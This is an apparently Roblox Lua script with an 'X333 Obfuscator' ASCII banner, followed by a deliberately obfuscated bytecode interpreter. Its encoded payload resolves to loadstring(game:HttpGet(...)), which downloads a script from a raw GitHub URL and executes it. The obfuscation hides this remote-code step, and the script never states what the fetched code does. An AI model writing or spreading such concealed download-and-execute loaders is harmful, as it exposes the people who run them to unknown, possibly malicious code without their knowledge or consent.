--[[


██╗░░██╗██████╗░██████╗░██████╗░  ░█████╗░██████╗░███████╗██╗░░░██╗░██████╗░█████╗░░█████╗░████████╗░█████╗░██████╗░
╚██╗██╔╝╚════██╗╚════██╗╚════██╗  ██╔══██╗██╔══██╗██╔════╝██║░░░██║██╔════╝██╔══██╗██╔══██╗╚══██╔══╝██╔══██╗██╔══██╗
░╚███╔╝░░█████╔╝░█████╔╝░█████╔╝  ██║░░██║██████╦╝█████╗░░██║░░░██║╚█████╗░██║░░╚═╝███████║░░░██║░░░██║░░██║██████╔╝
░██╔██╗░░╚═══██╗░╚═══██╗░╚═══██╗  ██║░░██║██╔══██╗██╔══╝░░██║░░░██║░╚═══██╗██║░░██╗██╔══██║░░░██║░░░██║░░██║██╔══██╗
██╔╝╚██╗██████╔╝██████╔╝██████╔╝  ╚█████╔╝██████╦╝██║░░░░░╚██████╔╝██████╔╝╚█████╔╝██║░░██║░░░██║░░░╚█████╔╝██║░░██║
╚═╝░░╚═╝╚═════╝░╚═════╝░╚═════╝░  ░╚════╝░╚═════╝░╚═╝░░░░░░╚═════╝░╚═════╝░░╚════╝░╚═╝░░╚═╝░░░╚═╝░░░░╚════╝░╚═╝░░╚═╝

██╗  ██╗░░░░░███████╗██╗░░░██╗███████╗██╗░░░░░  ██╗
╚═╝  ██║░░░░░██╔════╝██║░░░██║██╔════╝██║░░░░░  ╚═╝
░░░  ██║░░░░░█████╗░░╚██╗░██╔╝█████╗░░██║░░░░░  ░░░
░░░  ██║░░░░░██╔══╝░░░╚████╔╝░██╔══╝░░██║░░░░░  ░░░
██╗  ███████╗███████╗░░╚██╔╝░░███████╗███████╗  ██╗
╚═╝  ╚══════╝╚══════╝░░░╚═╝░░░╚══════╝╚══════╝  ╚═╝

░██████╗░░█████╗░██████╗░██╗░░░░░██╗██╗░░██╗███████╗
██╔════╝░██╔══██╗██╔══██╗██║░░░░░██║██║░██╔╝██╔════╝
██║░░██╗░██║░░██║██║░░██║██║░░░░░██║█████═╝░█████╗░░
██║░░╚██╗██║░░██║██║░░██║██║░░░░░██║██╔═██╗░██╔══╝░░
╚██████╔╝╚█████╔╝██████╔╝███████╗██║██║░╚██╗███████╗
░╚═════╝░░╚════╝░╚═════╝░╚══════╝╚═╝╚═╝░░╚═╝╚══════╝


]]--

do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;local v16;while true do if (v0==3) then v10=getfenv or function()return _ENV;end;v11=setmetatable;v12=pcall;v0=4;end if (0==v0) then v1=tonumber;v2=string.byte;v3=string.char;v0=1;end if (2==v0) then v7=table.concat;v8=table.insert;v9=math.ldexp;v0=3;end if (v0==4) then v13=select;v14=unpack or table.unpack;v15=tonumber;v0=5;end if (v0==1) then v4=string.sub;v5=string.gsub;v6=string.rep;v0=2;end if (v0==5) then v16=nil;v16=function(v25,v26,...)local v27=1;local v28;v25=v5(v4(v25,5),"..",function(v29)if (v2(v29,2)==79) then v28=v1(v4(v29,1,1));return "";else local v82=v3(v1(v29,16));if v28 then local v87=v6(v82,v28);v28=nil;return v87;else return v82;end end end);local function v30(v31,v32,v33)if v33 then local v83=1736 -(43 + 1693);local v84;while true do if (v83==((1626 -(1389 + 237)) -0)) then v84=(v31/(2^(v32-((1 -0) + 0))))%((3 -1)^(((v33-(4 -3)) -(v32-(139 -(95 + 43)))) + 1 + 0 + 0));return v84-(v84%((4777 -3498) -(330 + (2094 -(600 + 546)))));end end else local v85=((1323 -(910 + 1)) -(29 + 381))^(v32-(1 + 0));return (((v31%(v85 + v85))>=v85) and (1719 -(1256 + (733 -271)))) or (0 + 0);end end local function v34()local v47=v2(v25,v27,v27);v27=v27 + 1;return v47;end local function v35()local v48,v49=v2(v25,v27,v27 + 2);v27=v27 + 1 + 1;return (v49 * (1035 -(213 + 566))) + v48;end local function v36()local v50,v51,v52,v53=v2(v25,v27,v27 + 2 + 1);v27=v27 + (15 -11);return (v53 * (16778960 -(762 + 982))) + (v52 * 65536) + (v51 * 256) + v50;end local function v37()local v54=0 + 0;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v54==(4 -1)) then if (v59==(0 -0)) then if (v58==(0 + (1210 -(428 + 782)))) then return v60 * (1425 -(1050 + 375));else local v105=0 + 0 + 0;while true do if (v105==((191 -125) -(47 + 19))) then v59=248 -(90 + 157);v57=(61 + 1476) -(64 + 1473);break;end end end elseif (v59==(6678 -4631)) then return ((v58==(0 -0)) and (v60 * ((1204 -(1010 + 193))/(616 -((1744 -1359) + 231))))) or (v60 * NaN);end return v9(v60,v59-((6593 -2676) -2894)) * (v57 + (v58/(2^(2037 -(1117 + 868)))));end if (v54==(2 -(0 + 0))) then v59=v30(v56,1683 -((3388 -2391) + 665),31);v60=((v30(v56,893 -(801 + 60))==(1 + 0)) and  -(20 -(7 + 12))) or (683 -(381 + 301));v54=12 -9;end if (v54==(1373 -(852 + 520))) then v57=1 + 0;v58=(v30(v56,559 -(12 + 546),34 -14) * ((1 + 1)^((287 -(175 + 54)) -(160 -(32 + 102))))) + v55;v54=3 -1;end if (v54==(20 -(14 + 6))) then v55=v36();v56=v36();v54=1 + 0;end end end local function v38(v39)local v61;if  not v39 then v39=v36();if (v39==(0 -0)) then return "";end end v61=v4(v25,v27,(v27 + v39) -(1 + 0));v27=v27 + v39;local v62={};for v74=1 + 0, #v61 do v62[v74]=v3(v2(v4(v61,v74,v74)));end return v7(v62);end local v40=v36;local function v41(...)return {...},v13("#",...);end local function v42()local v63=0 -0;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if (v63==0) then local v86=0 + 0;while true do if (v86==0) then v64=0 -0;v65=nil;v86=1 + 0;end if (v86==1) then v63=1;break;end end end if (v63~=3) then else v70=nil;while true do local v88=0 + 0;local v89;while true do if (v88==0) then v89=0 + 0;while true do if (v89==0) then if (v64~=(5 -3)) then else local v110=0;local v111;while true do if (v110~=(0 + 0)) then else v111=0;while true do local v116=0;while true do if (v116~=0) then else if (v111==(1 + 0)) then local v126=0;while true do if (v126~=(266 -(53 + 213))) then else for v148=275 -(202 + 72),v36() do v67[v148]=v36();end return v68;end end end if (v111~=(0 -0)) then else local v127=0;while true do if (v127~=1) then else v111=1 + 0;break;end if (v127~=(0 -0)) then else for v150=1,v36() do local v151=0;local v152;local v153;while true do if (v151~=(184 -(157 + 26))) then else while true do if (v152~=(1489 -(594 + 895))) then else v153=v34();if (v30(v153,1891 -(25 + 1865),1)==(0 -0)) then local v174=0;local v175;local v176;local v177;while true do if (v174==(0 + 0)) then local v180=0;while true do if (v180~=(638 -(181 + 456))) then else v174=1;break;end if (v180~=0) then else v175=v30(v153,2,5 -2);v176=v30(v153,1 + 3,12 -6);v180=1116 -(574 + 541);end end end if (v174==(1083 -(347 + 733))) then if (v30(v176,3,3 + 0)==(3 -2)) then v177[1468 -(439 + 1025)]=v70[v177[11 -7]];end v65[v150]=v177;break;end if (v174==(1 + 1)) then if (v30(v176,286 -(181 + 104),1)~=(1 -0)) then else v177[2 -0]=v70[v177[1720 -(251 + 1467)]];end if (v30(v176,423 -(392 + 29),1723 -(1234 + 487))==1) then v177[3]=v70[v177[2 + 1]];end v174=1 + 2;end if (v174~=(114 -(55 + 58))) then else local v182=0;while true do if (v182==0) then v177={v35(),v35(),nil,nil};if (v175==0) then local v190=0 -0;local v191;while true do if (v190==0) then v191=0;while true do if (v191~=(0 + 0)) then else v177[371 -(98 + 270)]=v35();v177[217 -(49 + 164)]=v35();break;end end break;end end elseif (v175==1) then v177[3]=v36();elseif (v175==(1942 -(1828 + 112))) then v177[339 -(228 + 108)]=v36() -(2^16);elseif (v175==3) then local v196=0 -0;local v197;while true do if (v196~=0) then else v197=624 -(73 + 551);while true do if (v197~=0) then else v177[3]=v36() -(2^16);v177[1 + 3]=v35();break;end end break;end end end v182=2 -1;end if (v182==1) then v174=2;break;end end end end end break;end end break;end if ((0 + 0)~=v151) then else v152=1598 -(1456 + 142);v153=nil;v151=2 -1;end end end for v154=2 -1,v36() do v66[v154-(1 -0)]=v42();end v127=1 + 0;end end end break;end end end break;end end end if (v64==(2 -1)) then local v112=0 -0;while true do if (v112~=2) then else v64=2;break;end if (v112~=(1580 -(335 + 1244))) then else local v113=0;while true do if (v113==1) then v112=2;break;end if (v113==(11 -(9 + 2))) then for v120=3 -2,v69 do local v121=0 + 0;local v122;local v123;local v124;local v125;while true do if (v121==1) then v124=nil;v125=nil;v121=2;end if (v121~=2) then else while true do if (v122~=(66 -(9 + 56))) then else v125=nil;while true do if ((1 -0)~=v123) then else if (v124==(246 -(188 + 57))) then v125=v34()~=(0 + 0);elseif (v124==(2 + 0)) then v125=v37();elseif (v124~=3) then else v125=v38();end v70[v120]=v125;break;end if (v123~=(0 + 0)) then else local v166=0 -0;local v167;local v168;while true do if (v166~=0) then else v167=0;v168=nil;v166=1;end if (v166==(3 -2)) then while true do if (v167==(1335 -(339 + 996))) then v168=0 + 0;while true do if (v168==(2 -1)) then v123=1 + 0;break;end if (v168~=0) then else local v183=0;while true do if (v183==(1487 -(1066 + 420))) then v168=55 -(44 + 10);break;end if (v183~=(0 -0)) then else v124=v34();v125=nil;v183=1;end end end end break;end end break;end end end end break;end if (v122==0) then local v156=0;while true do if (v156~=0) then else local v169=0;while true do if (1~=v169) then else v156=1;break;end if (v169==(123 -(79 + 44))) then v123=0;v124=nil;v169=1 -0;end end end if (v156==(334 -(101 + 232))) then v122=1;break;end end end end break;end if (0==v121) then v122=0;v123=nil;v121=1;end end end v68[3]=v34();v113=1;end end end if (v112==0) then local v114=1341 -(1174 + 167);while true do if (v114~=(0 -0)) then else v69=v36();v70={};v114=1191 -(259 + 931);end if (v114~=(2 -1)) then else v112=1 -0;break;end end end end end v89=1;end if (v89==1) then if (v64~=(0 -0)) then else v65={};v66={};v67={};v68={v65,v66,nil,v67};v64=1;end break;end end break;end end end break;end if (v63~=(2 + 0)) then else v68=nil;v69=nil;v63=370 -(60 + 307);end if (v63==(817 -(361 + 455))) then v66=nil;v67=nil;v63=2 + 0;end end end local function v43(v44,v45,v46)local v71=v44[1];local v72=v44[2];local v73=v44[3];return function(...)local v76=0;local v77;local v78;local v79;local v80;local v81;while true do if (v76==3) then A,B=v41(v12(v81));if  not A[1] then local v100=v44[4][v77] or "?";error("Script error at ["   .. v100   .. "]:"   .. A[2]);else return v14(A,2,B);end break;end if (v76==1) then v79={...};v80=v13("#",...) -1;v76=2;end if (v76==2) then v81=nil;v81=function()local v90=v71;local v91=v72;local v92=v73;local v93=v41;local v94={};local v95={};local v96={};for v101=0 + 0,v80 do if (((4534 + 234)>=(832 + 632)) and (v101>=v92)) then v94[v101-v92]=v79[v101 + (850 -(151 + 698))];else v96[v101]=v79[v101 + 1 + 0];end end local v97=(v80-v92) + (1 -0);local v98;local v99;while true do local v102=(263 -(94 + 169)) + 0;local v103;local v104;while true do if (((742 -498)==((173 + 300) -(186 + 43))) and (0==v102)) then v103=0 -0;v104=nil;v102=1735 -(986 + 263 + 485);end if ((821==(1907 -((1343 -(910 + 362)) + 1015))) and (1==v102)) then while true do if ((v103==0) or (1905>=(1696 + (828 -(297 + 62))))) then v104=0;while true do if (((5267 -3028)<=(5816 -(770 + (2471 -(1108 + 250))))) and (v104==1)) then if (((3796 -(7514 -5111))<(1063 + 3841)) and (v99<=(3 + (0 -0)))) then if (((1242 + 2308)==3550) and (v99<=((4 -3) + 0))) then if ((v99>0) or (2840>=(6013 -(142 + 1819)))) then local v128=308 -(66 + 242);local v129;local v130;local v131;while true do if ((v128==(139 -(16 + 122))) or ((1840 -(578 + 802))>=1397)) then v131=nil;while true do if ((665<=(2917 -1785)) and (v129==((1274 -(1200 + 73)) + 0))) then while true do if ((((8167 + 1929) -6517)<(3196 + 1031)) and (v130==(0 -(0 + 0)))) then v131=v98[(600 -(342 + 256)) + 0 + 0];v96[v131]=v96[v131](v14(v96,v131 + (1 -(0 -0)),v78));break;end end break;end if ((v129==0) or (((1720 + 2356) -(1724 + 256))>((208 + 5675) -3378))) then v130=(0 -0) + 0;v131=nil;v129=1 + (0 -0);end end break;end if ((v128==(0 + 0)) or ((3315 -1454)>=3659)) then v129=1248 -(969 + 279);v130=nil;v128=1 -0;end end else v96[v98[1 + 1]]();end elseif ((v99>((1 -0) + 1)) or ((3225 + 600)<=(2686 -(936 + 344 + 502)))) then v96[v98[8 -6]]=v98[7 -(277 -(191 + 82))];else local v134=0 -0;local v135;local v136;local v137;local v138;while true do if ((1663<=(1726 + 1573)) and ((0 + 0)==v134)) then v135=v98[2];v136,v137=v93(v96[v135](v14(v96,v135 + 1,v98[1 + 2 + 0])));v134=493 -(446 + 46 + 0);end if ((v134==(2 -1)) or ((2248 -(603 + 82))>=(10338 -8251))) then local v147=0 -0;while true do if ((v147==(0 + (0 -0))) or ((678 -308)<=(1714 -((2181 -(1077 + 369)) + 785)))) then v78=(v137 + v135) -(1667 -(375 + 1291));v138=251 -(39 + 212);v147=1 + 0;end if (((5193 -((398 -285) + 609))>(233 + 306)) and (v147==(653 -(92 + 492 + 68)))) then v134=6 -4;break;end end end if ((2077>=(1829 -1126)) and (v134==2)) then for v157=v135,v78 do local v158=0;local v159;local v160;while true do if (((2273 -1421)==852) and (0==v158)) then v159=0 + 0;v160=nil;v158=1;end if (((1 -0)==v158) or (2852<(5455 -(1165 + 1921)))) then while true do if (((4167 -(760 + 121))>=(4446 -(248 + 1476))) and ((0 -0)==v159)) then v160=0 + 0;while true do if ((v160==(622 -(476 + 146))) or ((5271 -3002)<=(3919 -(1819 + 139)))) then v138=v138 + (3 -2);v96[v157]=v136[v138];break;end end break;end end break;end end end break;end end end elseif ((v99<=(143 -(14 + 124))) or ((2464 + (8892 -6791))<(2468 -(183 + 3 + 0)))) then if ((3022>=(3332 -(1204 + 157))) and (v99==4)) then v96[v98[2]]=v46[v98[630 -(142 + 485)]];else local v141=(355 -(34 + 321)) + 0;local v142;local v143;local v144;while true do if ((v141==(0 -0)) or ((50 + 722)>(8042 -5765))) then v142=0 -0;v143=nil;v141=1 -0;end if (((4029 -(1008 + 791))>(142 -80)) and (v141==(368 -(230 + 137)))) then v144=nil;while true do if ((v142==(0 -0)) or (((11684 -(218 + 559)) -7997)<=(3792 -(3847 -(320 + 1445))))) then local v161=0 -0;while true do if (((151 + 658)<=(205 + 607)) and (0==v161)) then v143=v98[2 + (1524 -(998 + 526))];v144=v96[v98[3]];v161=1 -0;end if ((14==((96 -76) -6)) and (v161==(355 -(183 + 171)))) then v142=509 -((237 -107) + 378);break;end end end if ((v142==(1 + 0 + (0 -0))) or (730>(2845 -(1194 + 268)))) then v96[v143 + 1 + (0 -0)]=v144;v96[v143]=v144[v98[4 + 0]];break;end end break;end end end elseif ((v99>6) or ((3372 -1671)<=(1691 -(322 + 196)))) then do return;end else v96[v98[1 + 1]]=v98[1495 -(127 + (1819 -(396 + 58)))]~=0;end v77=v77 + (1 -0);break;end if (((2474 + 726)>=(1291 -(234 + 446))) and (v104==((0 + 0) -0))) then local v115=0;while true do if ((v115==(0 + 0)) or ((9964 -5613)>(13032 -8462))) then v98=v90[v77];v99=v98[1 + 0];v115=3 -2;end if ((v115==(1 + 0)) or (377>(2654 -(43 + 127)))) then v104=644 -(269 + (1021 -647));break;end end end end break;end end break;end end end end;v76=3;end if (v76==0) then v77=1;v78= -1;v76=1;end end end;end return v43(v42(),{},v26)(...);end;v16("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C012O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F746F746B746F697A6E696F746B7564612F6170692F6D61696E2F4A707579645570567661577151682O647063566D627662795565584D596F577A6862415361674E7941757A756A425A6665796863656B72467A70764A6E55434E4D7344486C78594C57557268455861786C6374546372447356677768445345414464785A572O526D735362634A5069594E67564D4157666B4D676B6378686A6B6E5950595055415A646F4A514E2O427448502O4D626963515A6576584F4367687752455451504A7A7671554C67592O48756E5A43764E7762756B50415661624E4B6D5171467A6650466F73446B494C566C626957644265712O464E4C6E7961486C765053586B784F62585466635446636D425A586A4D5459735063454C56424400093O0012043O00013O001204000100023O002005000100010003001203000300044O0006000400014O0002000100044O00015O00026O000100012O00073O00017O00093O00023O00023O00023O00023O00023O00023O00023O00023O00033O00",v10(),...);break;end end end
